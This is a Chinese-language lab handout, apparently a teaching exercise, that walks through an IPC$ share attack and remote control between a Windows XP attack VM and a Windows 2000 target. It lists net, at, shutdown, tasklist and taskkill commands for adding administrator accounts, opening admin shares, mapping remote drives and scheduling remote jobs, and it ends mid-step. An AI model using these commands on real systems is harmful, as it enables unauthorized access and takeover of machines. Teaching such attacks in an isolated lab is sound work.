- 9
- 0
- 约2.09千字
- 约 16页
- 2019-10-16 发布于湖北
- 举报
?实验05-IPC$管道利用和远程控制
类别
网络设备攻击技术
实验课题名称
IPC$管道的利用与远程控制
实验目的与要求
通过实验了解IPC$攻击的原理与方法。
实验环境
VPC1(虚拟PC)
操作系统类型:windows xp
VPC1连接要求
与实验网络相连
VPC2(虚拟PC)
操作系统类型:windows 2000
VPC2连接要求
与实验网络相连
实验环境描述
以下称攻击机和靶机
预备知识
常用DOS远程攻击命令
*net user 查看用户列表
*net user 用户名 密码 /add 添加用户
*net user 用户名 密码 更改用户密码
*net localgroup administrators 用户名 /add 添加用户到管理组
*net user 用户名 /delete 删除用户
*net user 用户名 查看用户的基本情况
*net user 用户名 /active:no 禁用该用户
*net user 用户名 /active:yes 启用该用户
*net share 查看计算机ipc$共享资源
*net share 共享名 查看该共享的情况
*net share 共享名=路径 设置共享。例如 net share c$=c:
*net share 共享名 /delete 删除ipc$共享
*net use 查看ipc$连接情况
*net use \\ip\ipc$ 密码 /user:用户名 ipc$连接
*net time \\ip 查看远程计算机上的时间
*copy 路径:\文件名 \\ip\共享名 复制文件到已经ipc$连接的计算机上
*net view ip 查看计算机上的共享资源
*ftp 服务器地址 进入ftp服务器
*at 查看自己计算机上的计划作业
*at \\ip 查看远程计算机上的计划作业
*at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
*at \\ip 计划作业id /delete 删除远程计算机上的一个计划作业
*at \\ip all /delete 删除远程计算机上的全部计划作业
shutdown /参数 关闭或重启本地或远程主机。
参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。例:shutdown /r /t 0 立即重启本地主机(无延时)
taskkill /参数 进程名或进程的pid 终止一个或多个任务和进程。
参数说明:/PID 要终止进程的pid,可用tasklist命令获得 各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。
实验内容
实现一次完整的IPC$攻击
实验步骤
1.学生进入实验环境。
2.使用默认用户名:administrator,密码:mima1234登录到攻击机。
3.以下步骤在攻击机中进行
点击开始——控制面板,然后点击“切换到经典视图”如图所示
图3
4.在控制面板的双击“文件夹选项”,选中“查看”选项卡,将“使用简单文件共享(推荐)”前的勾去掉,点击确定,如图所示
图4
5.点击控制面板中的管理工具,进入本地安全策略,如图所示
图5
6.在本地安全设置中,依次选中本地策略——安全选项,右键“账户:使用空白密码的本地账户只允许进行控制台登录”点击“属性”,将其改为“已禁用”,并点击“确定”,如图所示
图6
7.在控制面板中将防火墙关闭,如图7所示
图7
10.重启后,点击开始——运行——cmd,在命令行提示符中输入ipconfig,获取攻击机的IP地址。
图10
图11
12.在靶机中打开命令行提示符,并输入命令net share,如果看到只有IPC$启动,如图所示,则键入命令net share admin$和net share c$=c:分别开启admin$,c$。
图13
13.在攻击机中输入命令net use \\靶机的IP地址 “密码”/user:用户名,如图所示
图14
14.输入net use Z: \\靶机的IP地址\c$回车,映射远程主机盘符,可以读写远程主机的共享C盘。如图所示。
图15
图16
15.输入net time \\靶机的IP地址 回车,可以查看靶机的时间,如图所示
图17
16.输入tasklist /S 靶机的IP地址 /U 靶机的用户名 /P “”回车,可以查看远程主机的进程,如图18所示。
图18
17.结合上次实
原创力文档

文档评论(0)